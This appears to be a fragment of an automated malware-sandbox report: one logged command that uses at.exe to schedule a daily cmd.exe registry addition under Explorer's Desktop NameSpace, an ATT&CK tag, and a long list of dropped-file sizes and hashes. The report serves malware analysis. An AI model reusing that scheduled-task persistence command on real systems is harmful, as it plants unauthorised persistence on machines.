C:\Windows\SysWOW64\at.exeat 21:37 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore\Desktop\NameSpace\{1f4de370-d627-11d1-ba4f-00a0c91eedba}"4⤵
- System Location Discovery: System Language Discovery
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
99B
MD51a9bba5fd15a82f64b6d065a16c25496
SHA125736f87c42be115e3123cb84046621e292e3ba0
SHA25658856f5a05acfffd349e1fff2413641345c0a07491d0c75b133285889fcad68d
SHA512d795c173439555213927efaf96e1d5eb0df14bb958179d8e3922c218b33b94691b50a39b23fc9146a48763d4849103b8514194f97e91e58076fe44f36d808e05
-
Filesize
695B
MD578e7c9252108196c8a479b2c863a5d66
SHA1c4430fca72196e950c2fe2edd7aac97e93176ef4
SHA256f25780ada59d4dc18e5fc553ef78e6d5a9cb643962b074be3f79ddcc0f205233
SHA512391ac4715ddc854e5e3c9eb7e0a5f9f0b2b9721f87af8ecbc04204b8e3b148d9afb99f54ccc11fc62fe6d498cfd813db09c519771ea48b207c05a84f7f1b0e81
-
Filesize
342B
MD5b2e9e9731f603741439a3fa36ece6bb0
SHA1291d6e84bdfdae1ed27e2a5800991f692b0fcf84
SHA2566b73cb63f1d041f301deba48d3cd55f1bcec0fe93b592e9fd2e689a4f7b5a921
SHA51233b4cd058d3f3bc2f963cc3033c906e08ea109f5cb2d34f9c6c92a6eb36ca181d963a9906b8e3a61e4d350a09a25185b1dc510d30e9502546acf9d95f4528737
-
Filesize
342B
MD54f766fd49928cdd2be49ecc37cec641f
SHA16ce6cb6119af8a9039357e4f7af27d64c6aec875
SHA2563084ff576d3cc9a84acd62d03b37435356273659e4dd501bd3988f10b8a91275
SHA512679fe616cdfba40e0b002a06bbf09b78c787d2c82b4dc425623391e83d5a922dd93a3dfdab67ad8898ccb016a692aa02441f5d4f131549aed02e685325590489
-
Filesize
342B
MD5420649114cdb57c220c78b959bf845f0
SHA108b7d3a564bbb66515941338418f92b270a6b244
SHA256a7345ac67e0c3edb956cdadb54205ba0a3f1d34426db46df7327e36b99a59ddb
SHA5123d9072389a579ce0a66f44f8e6c21bdc184c3c2348370d204c07764514b33f99de1c7d1d886626186dae5174f831cef3d68625d9246c1a9e9ce4e86566a48c5d
-
Filesize
342B
MD5c5ce4ba056d8286a2ed7c0653d980f2a
SHA1d16772baf21f1af0c8eb31430a81e1dae81ded4b
SHA2566e02caeef472f84cc25d50c50379c3ba87fbbf7f25139579ce25e02215f6cb7a
SHA51299f5ec3d274cc59f99b58b8f4682850cb5d6938043958299cbb368b08abc2a6602155a7271aff5035e1de0627b99bda5beea027ef90b6b071f983884506fe205
-
Filesize
342B
MD5c2f74376a6f89997b234cbc1b227ab5c
SHA144eceadf59ee98647c6b4a391eb748a213dc8065
SHA256e1872a558ee5fe43346733b962824b73ba9fe03fda9643f562cec9592b24fb5f
SHA51200aa4bd37c18851431c7da3510872341b6df5bca861d0dfc6c929c3d480f0bc4bc45794c0cf4ba585515c4f51661211351c5bc1527fe22d191eeb29de5014d0e
-
Filesize
342B
MD57d7503a7d015ace1898f43df3d296af0
SHA1274ec7829b19fe3eac81685c83c446a09e843a62
SHA256b2a7c8d021f718f32c881db179f3b568db82dad4b982695194b29b4663255e5b
SHA512232c92e9056d60903a6d5c6d4a91b250ada753fa8620b0e52e137f82bd9e96cb92a47c60faf94a4181327d24b12623ae63cee9931ce6f5d8f219ba73ec1c01c7
-
Filesize
342B
MD5cc92198e2ece5cca25e5c7cd481b0b87
SHA1a97fea10f3b6070c2a9a71dbd4ddf9d41dae9448
SHA2561ebfa850ef53058c2fbfc930fa497609a59002abb3ac325c0873d5c34c3e2480
SHA51201bc7c23b6dce253566f05c121f31703834d8ed3241745585b5a3c50c00850cf5940f6d01a2c3fc7d036fda2cd61f8bc2524092cb4986ea186c6dd6723306c4f
-
Filesize
342B
MD5c978f9f171fc44f223aa204eeb207161
SHA1af9fd95a990ebf7a965d96775d54743a5cac0743
SHA25612355dd52310bc016cf1dc4951a347c91901b356cf560f65f49cf695b100dbbf
SHA512cf35539eed8a85cc85e9e8c0fbdac1ddfd27b7b12bde8492e996cce63445d36df428098f9ade56d664a226f73a4f2fb6d14776f2849eadc105788f5dfd869865
-
Filesize
342B
MD5a31d5a9f7f4a2263a71f25c46ba0cc82
SHA17cf23e661962b16ee9afaa19d327791a18591f56
SHA256723c5d29a0e92cef65f5c188df4542da13ee75a9fd09d2c3fdcaf31a82d1a499
SHA51250dbd5f4b56038b2f8153e4b10ca9bd4edd95d6890ba83442b173548a4b5ac3e347184b06e19bb3b620231a1f874648169c7a6bc21277331225bb0729562f579
-
Filesize
342B
MD556de2ccbb0e2a44a028f72a6e7b3c4a3
SHA1f0b6a2d502fef39724e5f95e7f84b66adf4d030a
SHA25662f9783804f977c186c9f5616e71a43dfa770f8ccdafbe6fee312db03dca0166
SHA5124453105af6d3bef2726523cd00826e247c3de2c11aebc49e8ea053f1a10ebb105068bdd1c2280ef6213789b659845e817f0e05008d03ef7fe563eb284dce93f6
-
Filesize
342B
MD51ed8533fe3ede244ffebc92d5de1844c
SHA1fb424daf1f481970b515a4e1ee74bb9c5fc9be96
SHA256ab6dd52141d4aa6692d111e64354445c6a546a6d7bfebf260904dd0962e8bb15
SHA512e2a722831f9f8e22079b5bc4c1f245a458e30644713465715b5d8bccacd774e3c57823670d661eb35901391781391e65e49976f8340fe2b82d7b4a87d958e850
-
Filesize
342B
MD52d0540c4514a7d0348ac15fde318bc76
SHA1e8f2a545d4c616fd3fedf7313f3fce4e183461e7
SHA2564a4af094bf29341186883f82b0944099ef617a89efcbb8fb92a08e3f60c866c6
SHA512874b9f4e9f90bae890740830e97ae9c42e156c740ea0dbaed11f56c140db448ecc3d3aa4d8e515f3154a3a38afe84dd380dd1118706a83cbddfd625ad4c5551f
-
Filesize
342B
MD538f78f43c4b335cbdb546936318feb21
SHA12fc4d82a7e5124ae26620a07bf5d65bd0cbc9072
SHA25662f9666268f84d8aa265195f0f1b34c9b924441c7480543d460b862dbf56bccc
SHA5120b9f188f05cd08f0d91b82847eeace23ef187b814058979d68b0f4a7d4a46eb2594ec2b4026e75bd6f792a2793a5f5d78822377c3c382d004db9bb2dc6ce3203
-
Filesize
342B
MD50c5a24c65cd37faffd14b7cd9bbd979b
SHA18ae3243ad9386e4db4b9d71a589d12705452cc6b
SHA25670c16fb4a9cd0893f500ece1d9023aafe4cbab3fd3efb2840eb98d9e66162e9f
SHA512f69c11c5eb0ce8a652770f3205ac6a25e1bb78e260096c6aefadcaa1fd68224f3a99fa02209d945f6c17bb99d399a42ab8011a2e3831df7690fb1ace3e0e9f30
-
Filesize
342B
MD5285d404570daabf0308dbec18cb55ffb
SHA1987fb7d55355bfd66db2f0fa2ef3552674fc1fdc
SHA2563a0ff78d6c6e364f05295bdc47a1eac84cd3272bfdf24e4445cc9627f1590f17
SHA512dc42590f1d72be07d341713fcb2510417647b0f4f3fdb3883f45cffb4f4860c5f8b799fa1d82abd5a46af3fc393458b1743d955ec209a5c3d3fe4651f320f26e
-
Filesize
342B
MD523a7a2ec51f0606a3c241c4eab063ecc
SHA1d720290a7a51367cfded8239303735392bd0a9b5
SHA256e1da11ebfb2ea4b536acc0011c8b96f956437e66a056405f35637c70b08d7aed
SHA51270a129ffbf934dd62d7b261f0be22ab50495d5443b2ac2a71eb6fd3be4dd6617b560ad40226530699366d4be3d852fa2280bb9aad039cbcbd258552172aeab5f
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1010B
MD567f275be0cba17ec6a8600b7a7a96bb7
SHA196ab9e91d456dfd086ee741a7b108eacbc6da7bb
SHA256839a792abb4dc63b180abfd352ca79b026287cfa9739766861bbdf1d3a6dd98f
SHA512b48f53ae67147ad28c9ef796102c78a0c0dd8e035d28e503a6393a15f706db0ed31635c3c361195337c94e5854cfb83ffd3995f8b59787e3caae92534b8fc8d4
-
Filesize
276B
MD505b65aa7868e4bb260e88fc956d5506e
SHA1468bc7e2aa2ab62857f29eff1195f98a5484b4d0
SHA2564e9f3b727bcabff0b264f3b2ca5e502a525a6d036a821a84b9aa25c2f0c8227a
SHA5124d556a5503dbc171f679a345803a61bd387a73475ac54172d8ec1b70922b95c86d20ad62d4d2703dce4c9c8367659ddcc08bedc2677ca43a25ac39e7c7fb4118
-
Filesize
337B
MD5b6bd65cfd7281f4596867a9b1b24c30d
SHA1cb10730772b45e0a41eef4a96e85cd23bbb28798
SHA256797350e60de3cff6f13056abdab3171cd0821a1b95da8f8942c49030faed0ac8
SHA512513ef303e875a609c1731aef61ae124652923989cd0efa1b109e51204a705e1111e2e91bf4807f483bc44900c4061b54b6806cd357886743209d2ca3a85bb427
-
Filesize
11KB
MD56d7ff34270c389fe244657786c453255
SHA17db19943595a3525fb03908c80b745e6b9d96967
SHA2562b902c327edc8791396d0ea7db3ee9ffcfcf3bf73f741d921c514cb11bbebd31
SHA512d5dbb7f543b6c78656fea157aea23fd58c4f8eff6b02ef243adbc2be5c832a55d04da72a44cd1684c277bd9723a399bfdb2bde4dc516fd5f46cde59a16319d68
-
Filesize
3KB
MD51a1353284d2b018b157d84837c6b7bec
SHA1e694db1791e76843b7f6423d3eed883a9e5baa15
SHA2562d57480747019a3bea799bbb4119fe258b7d74fd04632d3e2f984387b64032a4
SHA51218a0158f08c83a5976192bb61fde39a1ed6185edd3bcbd75e41d875b3b9b7f67f8430f81469b5d676cd9eb91d66cc33e72d9793058bd56a23b05e1bfe8f7013b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b